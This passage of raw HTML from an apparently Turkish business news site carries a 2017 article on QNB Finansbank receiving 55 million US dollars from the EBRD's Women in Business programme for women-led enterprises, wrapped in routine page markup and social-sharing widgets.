            </div>
           
          
          

          <div>
            
            <div id="main" class="span8">
              <div class="row-fulid">
                                                  <div id="breadcrumb">
    <ul class="breadcrumb">
    <li>Buradasınız: </li>
    <li><a href="http://www.kobi-efor.com.tr/">Ana Sayfa</a> <span class="divider">/</span></li>
    <li class="active"><a href="http://www.kobi-efor.com.tr/reel-sektor">REEL SEKTÖR</a></li>
  </ul>
</div>
  <article id="haber">
   
  <div class="page-header">
    <div class="row-fluid muted">
      <p class="pull-left">01 Eylül 2017 Cuma 08:00<br>Bu haber <b>587</b> kez okundu.</p>
      <p class="pull-right karakterislem secilemez">
        <i class="glyphicons-icon font-down"></i>
        <i class="glyphicons-icon font-up"></i>
        <i class="glyphicons-icon font-normal"></i>
        <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a>
      </p>
    </div>
        <h1 class="title">EBRD, kadınlar için 55 milyon ABD doları kredi sağladı</h1><p class="lead">QNB Finansbank, European Bank for Reconstruction and Development’ın (EBRD-Avrupa İmar ve Kalkınma Bankası) kadın girişimcilere destek programı Women in Business kapsamında, kadınların sahibi veya yöneticisi olduğu işletmelere kullandırmak üzere 55 milyon dolar kredi sağladı.</p>

  </div>
    <div class="row-fluid newspic"><img src="http://www.kobi-efor.com.tr/images/haberler/ebrd_kadinlar_icin_55_milyon_abd_dolari_kredi_sagladi_h6788_a6c4a.jpg" alt="EBRD, kadınlar için 55 milyon ABD doları kredi sağladı" /></div>
   
      <div class="row-fluid page-social">
      <div class="span12">
        <div class="shr">
        <div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>



<div class="fb-like" data-href="http://www.kobi-efor.com.tr/reel-sektor/ebrd-kadinlar-icin-55-milyon-abd-dolari-kredi-sagladi-h6788.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div>
<div class="btn-social-wrapper">
                <a class="btn-social btn-facebook" href="https://www.facebook.com/sharer/sharer.php?u=http://www.kobi-efor.com.tr/reel-sektor/ebrd-kadinlar-icin-55-milyon-abd-dolari-kredi-sagladi-h6788.html"
                    onclick="window.open(this.href, 'facebook-share','width=605,height=370');return false;"><i class="social-icon white facebook"></i> Facebook'ta Paylaş
                </a>
                <a class="btn-social btn-twitter" href="http://twitter.com/share?text=EBRD%2C+kad%C4%B1nlar+i%C3%A7in+55+milyon+ABD+dolar%C4%B1+kredi+sa%C4%9Flad%C4%B1&url=http://www.kobi-efor.com.tr/reel-sektor/ebrd-kadinlar-icin-55-milyon-abd-dolari-kredi-sagladi-h6788.html"
                    onclick="window.open(this.href, 'twitter-share', 'width=570,height=290');return false;"><i class="social-icon white twitter"></i> Tweetle
                </a>
                <a class="btn-social btn-google" href="https://plus.google.com/share?url=http://www.kobi-efor.com.tr/reel-sektor/ebrd-kadinlar-icin-55-milyon-abd-dolari-kredi-sagladi-h6788.html"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white google_plus"></i> Google+ Paylaş
                </a>
                <a class="btn-social btn-linkedin" href="http://www.linkedin.com/shareArticle?mini=true&url=http://www.kobi-efor.com.tr/reel-sektor/ebrd-kadinlar-icin-55-milyon-abd-dolari-kredi-sagladi-h6788.html&title=EBRD%2C+kad%C4%B1nlar+i%C3%A7in+55+milyon+ABD+dolar%C4%B1+kredi+sa%C4%9Flad%C4%B1"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white linked_in"></i> LinkedIn'de Paylaş
                </a>
</div>



        </div>
      </div>
    </div>
  <div id="newstext" class="row-fluid page-content">
                          <span style="font-size: 12px;"><span style="font-family: Verdana;"><span style="line-height: 115%;"><a href="http://www.kobi-efor.com.tr/haberleri/" title="" target="_blank" class="klink"></a>QNB Finansbank, EBRD’nin 300 milyon euroluk Kadın Girişimcilik Programı altında aldığı ilk krediyi en hızlı kullandıran ve ikinci kredi dilimine hak kazanan tek Türk bankası oldu. QNB Finansbank’ın toplam kadın girişimcilik kaynağı, bu yeni dilimle 100 milyon euroya ulaştı.<br/></span></span></span><span style="font-family: Verdana; font-size: 12px;">Avrupa İmar ve Kalkınma Bankası (EBRD) Türkiye Direktörü Jean Patrick Marquet, "Son derece başarılı olan bu program, uluslararası kuruluşlar ile yerel makamların güçlerini etki yaratacak şekilde birleştirmesinin harika bir örneği. Kadın yönetimindeki şirketlerden sürekli finansman ve danışmanlık hizmetlerine yönelik taleplere tanık olduğumuzu düşünürsek, programın devam etmemesi için hiçbir bir neden görmüyoruz" dedi. QNB Finansbank Genel Müdürü Temel Güzeloğlu; "EBRD Kadın Girişimcilik Programı altında 2015 yılından bugüne 6 bin 170 kadın girişimciyi destekledik. Toplam kredi tutarımız 246 milyon TL olarak gerçekleşti“ açıklamasını yaptı. </span>
                  </div>

        <div class="row-fluid">
        <div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>



<div class="fb-like" data-href="http://www.kobi-efor.com.tr/reel-sektor/ebrd-kadinlar-icin-55-milyon-abd-dolari-kredi-sagladi-h6788.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div>
<div class="btn-social-wrapper">
                <a class="btn-social btn-facebook" href="https://www.facebook.com/sharer/sharer.php?u=http://www.kobi-efor.com.tr/reel-sektor/ebrd-kadinlar-icin-55-milyon-abd-dolari-kredi-sagladi-h6788.html"
                    onclick="window.open(this.href, 'facebook-share','width=605,height=370');return false;"><i class="social-icon white facebook"></i> Facebook'ta Paylaş
                </a>
                <a class="btn-social btn-twitter" href="http://twitter.com/share?text=EBRD%2C+kad%C4%B1nlar+i%C3%A7in+55+milyon+ABD+dolar%C4%B1+kredi+sa%C4%9Flad%C4%B1&url=http://www.kobi-efor.com.tr/reel-sektor/ebrd-kadinlar-icin-55-milyon-abd-dolari-kredi-sagladi-h6788.html"
                    onclick="window.open(this.href, 'twitter-share', 'width=570,height=290');return false;"><i class="social-icon white twitter"></i> Tweetle
                </a>
                <a class="btn-social btn-google" href="https://plus.google.com/share?url=http://www.kobi-efor.com.tr/reel-sektor/ebrd-kadinlar-icin-55-milyon-abd-dolari-kredi-sagladi-h6788.html"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white google_plus"></i> Google+ Paylaş
                </a>
                <a class="btn-social btn-linkedin" href="http://www.linkedin.com/shareArticle?mini=true&url=http://www.kobi-efor.com.tr/reel-sektor/ebrd-kadinlar-icin-55-milyon-abd-dolari-kredi-sagladi-h6788.html&title=EBRD%2C+kad%C4%B1nlar+i%C3%A7in+55+milyon+ABD+dolar%C4%B1+kredi+sa%C4%9Flad%C4%B1"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white linked_in"></i> LinkedIn'de Paylaş
                </a>
</div>



        </div>
</article>

      <div class="row-fluid galleries">
    <div class="title">
      <span>İlgili Galeriler</span><hr>
    </div>
    <div class="content">
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/carklar-daha-hizli-donecek-resimleri,44.html" title="Çarklar Daha Hızlı Dönecek">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/2013-ayarli-buyume_1.jpg" alt="Çarklar Daha Hızlı Dönecek" />
          <b>Çarklar Daha Hızlı...</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/turizm-resimleri,43.html" title="Turizm">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/turizm_2.jpg" alt="Turizm" />
          <b>Turizm</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/telekomunikasyon-resimleri,42.html" title="Telekomünikasyon">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/telekomunikasyon_1.jpg" alt="Telekomünikasyon" />
          <b>Telekomünikasyon</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/madencilik-resimleri,41.html" title="Madencilik">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/madencilik_1.jpg" alt="Madencilik" />
          <b>Madencilik</b>
        </a>
      </div>
          </div>
  </div>
    <div id="yorumyap" style="margin:0"></div>
  <div class="row-fluid keywords"><div class="title"><span>Anahtar Kelimeler</span><hr></div><a href="http://www.kobi-efor.com.tr/haberleri/EBRD" title="EBRD haberleri">EBRD</a><a href="http://www.kobi-efor.com.tr/haberleri/QNB+Finansbank" title="QNB Finansbank haberleri">QNB Finansbank</a><a href="http://www.kobi-efor.com.tr/haberleri/Jean+Patrick+Marquet" title="Jean Patrick Marquet haberleri">Jean Patrick Marquet</a></div>
    <section>
            <div id="yorumlar">
            <ul class="nav nav-tabs" id="ytab">
              <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li>
               <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.kobi-efor.com.tr/reel-sektor/ebrd-kadinlar-icin-55-milyon-abd-dolari-kredi-sagladi-h6788.html">0</fb:comments-count></span></a></li>            </ul>

            <div class="tab-content">
                              <div class="tab-pane active" id="yorumpanel">
                                    <div class="yorumlar panel">
                    <div id="yorumpaneli" class="row-fluid">
                    <form  name="comment" class="comment_form" id="addcomment">
                        <div class="span1">
                                                        <img src="http://www.kobi-efor.com.tr/_themes/hs-vertigo/images/no_author.jpg" alt="Misafir Avatar" class="img-rounded"/>                        </div>
                        <div class="span11">
                            <div class="row-fluid">
                                <div class="input-prepend span6">
                                    <span class="add-on">İsim</span>
                                    <input name="isim"  class="span10 adsoyad" type="text"  id="adsoyad" size="30" maxlength="50"  title="Ad soyad gerekli!" />
                                </div>
                                                                <!--div class="input-prepend span6">
                                    <span class="add-on">E-Posta</span>
                                    <input name="email"  class="span9" type="text"  id="email" size="30" maxlength="50" value="" style="width: 202px;"  title="Yayınlanmayacak!" />
                                </div-->
                                                            </div>
                            <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" onfocus="textCheckFocus(this)" onblur="textCheckBlur(this)">Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!</textarea>
                            <div class="span12" style="margin:0;">
                            <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div>
                            <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(6788);return false;" class="btn btn-warning pull-right">Yorum Gönder</a>
                            <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div>
                        </div>
                        <input type="hidden" name="hid" value="6788" />
                        <input type="hidden" name="uid" value="0" />
                        <input type="hidden" name="tip" value="haber" />
                        <input type="hidden" name="cevap" value="" class="answer" />
                        <input type="hidden" name="cevap_id" value="0" class="cevap_id" />
                        <input type="hidden" name="token" value="1060948025d4094e5cc74bb8b3fd594078c7619b" />

                    </form>
                    </div>
                    <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div>
                </div> 
            
            
            
            </div> <!-- .tab-pane -->


                          <div class="tab-pane yorumlar fbpanel" id="facebookpanel">
                <div class="row-fluid">
                  <div id="fb-root"></div>
                  <script>(function(d, s, id) {
                    var js, fjs = d.getElementsByTagName(s)[0];
                    if (d.getElementById(id)) return;
                    js = d.createElement(s); js.id = id;
                    js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1";
                    fjs.parentNode.insertBefore(js, fjs);
                  }(document, 'script', 'facebook-jssdk'));</script>
                  <div class="fb-comments" data-href="http://www.kobi-efor.com.tr/reel-sektor/ebrd-kadinlar-icin-55-milyon-abd-dolari-kredi-sagladi-h6788.html" data-width="603" data-colorscheme="light" data-numposts="10"></div>
                </div> <!-- #facebookpanel -->
              </div>
            
          </div> <!-- .tab-content -->

        </div> <!-- #yorumlar -->

 
  </section>
    <div class="box haberler">
    <div class="box header">
      <h5><i class="glyphicons-icon globe"></i> <b>İlgili Haberler</b></h5>
    </div>
    <div class="box content">
      <div class="row-fluid first">
              <div class="span3">
          <a href="http://www.kobi-efor.com.tr/reel-sektor/filli-boya-bilim-kampi-cocuklarin-hayatina-dokunuyor-h6800.html" title="Filli Boya Bilim Kampı çocukların hayatına dokunuyor">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/filli_boya_bilim_kampi_cocuklarin_hayatina_dokunuyor_h6800_d348e.jpg" alt="Filli Boya Bilim Kampı çocukların hayatına dokunuyor" />
            <b>Filli Boya Bilim Kampı çocukların hayatına dokunuyor</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/reel-sektor/ebso-baskani-ender-yorgancilar-kalkinma-bankasi-endustri-40-ve-dijitallesme-icin-ozel-kaynak-ayirmali-h6799.html" title="EBSO Başkanı Ender Yorgancılar: “Kalkınma Bankası, Endüstri 4.0 ve dijitalleşme için özel kaynak ayırmalı”">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ebso_baskani_ender_yorgancilar_kalkinma_bankasi_endustri_40_ve_dijitallesme_icin_ozel_kaynak_ayirmali_h6799_375fc.jpg" alt="EBSO Başkanı Ender Yorgancılar: “Kalkınma Bankası, Endüstri 4.0 ve dijitalleşme için özel kaynak ayırmalı”" />
            <b>EBSO Başkanı Ender Yorgancılar: “Kalkınma Bankası,...</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/reel-sektor/tat-tarimda-dijitallesmeye-onculuk-ediyor-h6798.html" title="TAT tarımda dijitalleşmeye öncülük ediyor">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tat_tarimda_dijitallesmeye_onculuk_ediyor_h6798_d31c7.jpg" alt="TAT tarımda dijitalleşmeye öncülük ediyor" />
            <b>TAT tarımda dijitalleşmeye öncülük ediyor</b>
          </a>
        </div>  
                </div> 
        <div class="row-fluid">
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/reel-sektor/turkonfed-ve-ikv-sanayi-40-icin-gumruk-birligi-modernizasyonunu-ele-aldi-h6797.html" title="TÜRKONFED ve İKV Sanayi 4.0 için Gümrük Birliği modernizasyonunu ele aldı">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkonfed_ve_ikv_sanayi_40_icin_gumruk_birligi_modernizasyonunu_ele_aldi_h6797_d0d24.jpg" alt="TÜRKONFED ve İKV Sanayi 4.0 için Gümrük Birliği modernizasyonunu ele aldı" />
            <b>TÜRKONFED ve İKV Sanayi 4.0 için Gümrük Birliği...</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/reel-sektor/ge-ve-ttgvden-isbirligi-h6796.html" title="GE ve TTGV’den işbirliği">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ge_ve_ttgvden_isbirligi_h6796_657bc.jpg" alt="GE ve TTGV’den işbirliği" />
            <b>GE ve TTGV’den işbirliği</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/reel-sektor/cinli-dev-sumec-smart-energy-ile-turkiyede-buyume-karari-aldi-h6795.html" title="Çinli dev SUMEC, Smart Energy ile Türkiye’de büyüme kararı aldı">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/cinli_dev_sumec_smart_energy_ile_turkiyede_buyume_karari_aldi_h6795_994a2.jpg" alt="Çinli dev SUMEC, Smart Energy ile Türkiye’de büyüme kararı aldı" />
            <b>Çinli dev SUMEC, Smart Energy ile Türkiye’de büyüme...</b>
          </a>
        </div>  
                    </div> 
    </div>
  </div>
   
                 
              </div>
            </div>
                        <div class="aside">
              <div id="sidebar" class="span4">
                <div class="row-fulid">
                                          <!-- REKLAM-26  -->
            <div class="reklam"><a href="http://www.kobi-efor.com.tr/banner.php?id=202" target="_blank" rel="nofollow"><img src="http://www.kobi-efor.com.tr/thumb.php?src=http://www.kobi-efor.com.tr/images/banner/ofisimBanner.jpg&w=300&h=250&q=90" width="300" height="250" style="width:300px;height: 250px;border:0" alt="banner202" /></a></div>
                                                  <!-- ONE CIKANLAR  -->
            <div id="onecikanlar">
              <div class="header">
                <h5><i class="halflings-icon white star"></i>Reel Sektör Haberleri</h5>
                <a class="control left" href="#" id="onprev"></a>
                <a class="control right" href="#" id="onnext"></a>
              </div>
              <div class="content">
                  <div class="item">
                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/finansal-kurumlar-birligi-2017-yilinin-ilk-6-aylik-sonuclarini-acikladi-h6787.html" title="Finansal Kurumlar Birliği, 2017 yılının ilk 6 aylık sonuçlarını açıkladı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/finansal_kurumlar_birligi_2017_yilinin_ilk_6_aylik_sonuclarini_acikladi_h6787_780a4.jpg" alt="Finansal Kurumlar Birliği, 2017 yılının ilk 6 aylık sonuçlarını açıkladı" />
                    <p>Finansal Kurumlar Birliği, 2017 yılının ilk 6 aylık sonuçlarını açıkladı</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/oluklu-mukavva-sektoru-ilk-ceyrekte-yuzde-10-buyudu-h6781.html" title="Oluklu mukavva sektörü ilk çeyrekte yüzde 10 büyüdü">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/oluklu_mukavva_sektoru_ilk_ceyrekte_yuzde_10_buyudu_h6781_239ac.jpg" alt="Oluklu mukavva sektörü ilk çeyrekte yüzde 10 büyüdü" />
                    <p>Oluklu mukavva sektörü ilk çeyrekte yüzde 10 büyüdü</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/stem-ile-girisimde-yeni-ufuklar-projesinde-sona-gelindi-h6776.html" title="STEM ile Girişimde Yeni Ufuklar projesinde sona gelindi">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/stem_ile_girisimde_yeni_ufuklar_projesinde_sona_gelindi_h6776_763f7.jpg" alt="STEM ile Girişimde Yeni Ufuklar projesinde sona gelindi" />
                    <p>STEM ile Girişimde Yeni Ufuklar projesinde sona gelindi</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/denizbank-tosyov-turkiyenin-7-bolgesindeki-kobiler-icin-tekrar-el-ele-verdi-h6778.html" title="DenizBank ; TOSYÖV Türkiye&#039;nin 7 bölgesindeki KOBİ&#039;ler için tekrar el ele verdi">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/denizbank_tosyov_turkiyenin_7_bolgesindeki_kobiler_icin_tekrar_el_ele_verdi_h6778_504c5.jpg" alt="DenizBank &amp; TOSYÖV Türkiye’nin 7 bölgesindeki KOBİ’ler için tekrar el ele verdi" />
                    <p>DenizBank &amp; TOSYÖV Türkiye’nin 7 bölgesindeki KOBİ’ler için tekrar el ele verdi</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/dijital-devrim-kalkinma-stratejisinin-merkezinde-yer-almali-h6792.html" title="&#039;Dijital devrim kalkınma stratejisinin merkezinde yer almalı”">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/dijital_devrim_kalkinma_stratejisinin_merkezinde_yer_almali_h6792_2c8d1.jpg" alt="“Dijital devrim kalkınma stratejisinin merkezinde yer almalı”" />
                    <p>“Dijital devrim kalkınma stratejisinin merkezinde yer almalı”</p>
                  </a>
                  
                                  </div>
                <div class="item">                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/is-leasing-online-sube-uygulamasi-gibi-yeni-uygulamalarla-is-kalitesini-artirmaya-devam-ediyor-h6790.html" title="İş Leasing, online şube uygulaması gibi yeni uygulamalarla iş kalitesini artırmaya devam ediyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/is_leasing_online_sube_uygulamasi_gibi_yeni_uygulamalarla_is_kalitesini_artirmaya_devam_ediyor_h6790_d7cbe.jpg" alt="İş Leasing, online şube uygulaması gibi yeni uygulamalarla iş kalitesini artırmaya devam ediyor" />
                    <p>İş Leasing, online şube uygulaması gibi yeni uygulamalarla iş kalitesini artırmaya devam ediyor</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/alper-kanca-orta-olcekli-sanayi-kuruluslarindaki-ar-ge-merkezi-sayisinda-artis-bekliyoruz-h6777.html" title="Alper Kanca: &#039;Orta ölçekli sanayi kuruluşlarındaki Ar-Ge merkezi sayısında artış bekliyoruz”">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/alper_kanca_orta_olcekli_sanayi_kuruluslarindaki_ar_ge_merkezi_sayisinda_artis_bekliyoruz_h6777_05098.jpg" alt="Alper Kanca: “Orta ölçekli sanayi kuruluşlarındaki Ar-Ge merkezi sayısında artış bekliyoruz”" />
                    <p>Alper Kanca: “Orta ölçekli sanayi kuruluşlarındaki Ar-Ge merkezi sayısında artış bekliyoruz”</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/cinde-gerceklestirilecek-turkiye-turizm-yili-etkinlikleri-tanitiliyor-h6785.html" title="Çin&#039;de gerçekleştirilecek ‘Türkiye Turizm Yılı&#039; etkinlikleri tanıtılıyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/cinde_gerceklestirilecek_turkiye_turizm_yili_etkinlikleri_tanitiliyor_h6785_0b353.jpg" alt="Çin’de gerçekleştirilecek ‘Türkiye Turizm Yılı’ etkinlikleri tanıtılıyor" />
                    <p>Çin’de gerçekleştirilecek ‘Türkiye Turizm Yılı’ etkinlikleri tanıtılıyor</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/cinli-dev-sumec-smart-energy-ile-turkiyede-buyume-karari-aldi-h6795.html" title="Çinli dev SUMEC, Smart Energy ile Türkiye&#039;de büyüme kararı aldı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/cinli_dev_sumec_smart_energy_ile_turkiyede_buyume_karari_aldi_h6795_994a2.jpg" alt="Çinli dev SUMEC, Smart Energy ile Türkiye’de büyüme kararı aldı" />
                    <p>Çinli dev SUMEC, Smart Energy ile Türkiye’de büyüme kararı aldı</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/yurtdisinda-calismak-mutluluk-getirmiyor-h6786.html" title="Yurtdışında çalışmak mutluluk getirmiyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yurtdisinda_calismak_mutluluk_getirmiyor_h6786_6a9c0.jpg" alt="Yurtdışında çalışmak mutluluk getirmiyor" />
                    <p>Yurtdışında çalışmak mutluluk getirmiyor</p>
                  </a>
                  
                                  </div>
                <div class="item">                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/celik-federasyonu-kuruldu-h6794.html" title="Çelik Federasyonu kuruldu">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/celik_federasyonu_kuruldu_h6794_c200f.jpg" alt="Çelik Federasyonu kuruldu" />
                    <p>Çelik Federasyonu kuruldu</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/tim-ihracatcilarin-finansman-sorunlarina-odaklaniyor-h6775.html" title="TİM, ihracatçıların finansman sorunlarına odaklanıyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tim_ihracatcilarin_finansman_sorunlarina_odaklaniyor_h6775_596a9.jpg" alt="TİM, ihracatçıların finansman sorunlarına odaklanıyor" />
                    <p>TİM, ihracatçıların finansman sorunlarına odaklanıyor</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/ebso-baskani-ender-yorgancilar-kalkinma-bankasi-endustri-40-ve-dijitallesme-icin-ozel-kaynak-ayirmali-h6799.html" title="EBSO Başkanı Ender Yorgancılar: &#039;Kalkınma Bankası, Endüstri 4.0 ve dijitalleşme için özel kaynak ayırmalı”">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ebso_baskani_ender_yorgancilar_kalkinma_bankasi_endustri_40_ve_dijitallesme_icin_ozel_kaynak_ayirmali_h6799_375fc.jpg" alt="EBSO Başkanı Ender Yorgancılar: “Kalkınma Bankası, Endüstri 4.0 ve dijitalleşme için özel kaynak ayırmalı”" />
                    <p>EBSO Başkanı Ender Yorgancılar: “Kalkınma Bankası, Endüstri 4.0 ve dijitalleşme için özel kaynak ayırmalı”</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/filli-boya-bilim-kampi-cocuklarin-hayatina-dokunuyor-h6800.html" title="Filli Boya Bilim Kampı çocukların hayatına dokunuyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/filli_boya_bilim_kampi_cocuklarin_hayatina_dokunuyor_h6800_d348e.jpg" alt="Filli Boya Bilim Kampı çocukların hayatına dokunuyor" />
                    <p>Filli Boya Bilim Kampı çocukların hayatına dokunuyor</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/tat-tarimda-dijitallesmeye-onculuk-ediyor-h6798.html" title="TAT tarımda dijitalleşmeye öncülük ediyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tat_tarimda_dijitallesmeye_onculuk_ediyor_h6798_d31c7.jpg" alt="TAT tarımda dijitalleşmeye öncülük ediyor" />
                    <p>TAT tarımda dijitalleşmeye öncülük ediyor</p>
                  </a>
                  
                                  </div>
                <div class="item">                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/tbb-acikladi-yasal-takibe-girenlerin-sayisi-artiyor-h6784.html" title="TBB açıkladı: Yasal takibe girenlerin sayısı artıyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tbb_acikladi_yasal_takibe_girenlerin_sayisi_artiyor_h6784_24683.jpg" alt="TBB açıkladı: Yasal takibe girenlerin sayısı artıyor" />
                    <p>TBB açıkladı: Yasal takibe girenlerin sayısı artıyor</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/mitsubishi-electricten-e-fctory-konsepti-h6793.html" title="Mitsubishi Electric&#039;ten e-F@ctory konsepti">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/mitsubishi_electricten_e_fctory_konsepti_h6793_816bf.jpg" alt="Mitsubishi Electric’ten e-F@ctory konsepti" />
                    <p>Mitsubishi Electric’ten e-F@ctory konsepti</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/ge-ve-ttgvden-isbirligi-h6796.html" title="GE ve TTGV&#039;den işbirliği">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ge_ve_ttgvden_isbirligi_h6796_657bc.jpg" alt="GE ve TTGV’den işbirliği" />
                    <p>GE ve TTGV’den işbirliği</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/turkonfed-ve-ikv-sanayi-40-icin-gumruk-birligi-modernizasyonunu-ele-aldi-h6797.html" title="TÜRKONFED ve İKV Sanayi 4.0 için Gümrük Birliği modernizasyonunu ele aldı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkonfed_ve_ikv_sanayi_40_icin_gumruk_birligi_modernizasyonunu_ele_aldi_h6797_d0d24.jpg" alt="TÜRKONFED ve İKV Sanayi 4.0 için Gümrük Birliği modernizasyonunu ele aldı" />
                    <p>TÜRKONFED ve İKV Sanayi 4.0 için Gümrük Birliği modernizasyonunu ele aldı</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/ebrd-kadinlar-icin-55-milyon-abd-dolari-kredi-sagladi-h6788.html" title="EBRD, kadınlar için 55 milyon ABD doları kredi sağladı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ebrd_kadinlar_icin_55_milyon_abd_dolari_kredi_sagladi_h6788_a6c4a.jpg" alt="EBRD, kadınlar için 55 milyon ABD doları kredi sağladı" />
                    <p>EBRD, kadınlar için 55 milyon ABD doları kredi sağladı</p>
                  </a>
                  
                                  </div>
                <div class="item">                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/gittigidiyor-5-ayda-500-kobi-yi-sektore-kazandiracak-h6780.html" title="GittiGidiyor, 5 ayda 500 KOBİ&#039;yi sektöre kazandıracak">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/gittigidiyor_5_ayda_500_kobi_yi_sektore_kazandiracak_h6780_60ca3.jpg" alt="GittiGidiyor, 5 ayda 500 KOBİ&#039;yi sektöre kazandıracak" />
                    <p>GittiGidiyor, 5 ayda 500 KOBİ&#039;yi sektöre kazandıracak</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/temmuz-ihracati-yuzde-312-artisla-114-milyar-dolar-oldu-h6783.html" title="Temmuz ihracatı yüzde 31.2 artışla 11.4 milyar dolar oldu">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/temmuz_ihracati_yuzde_312_artisla_114_milyar_dolar_oldu_h6783_9e54c.jpg" alt="Temmuz ihracatı yüzde 31.2 artışla 11.4 milyar dolar oldu" />
                    <p>Temmuz ihracatı yüzde 31.2 artışla 11.4 milyar dolar oldu</p>
                  </a>
                  
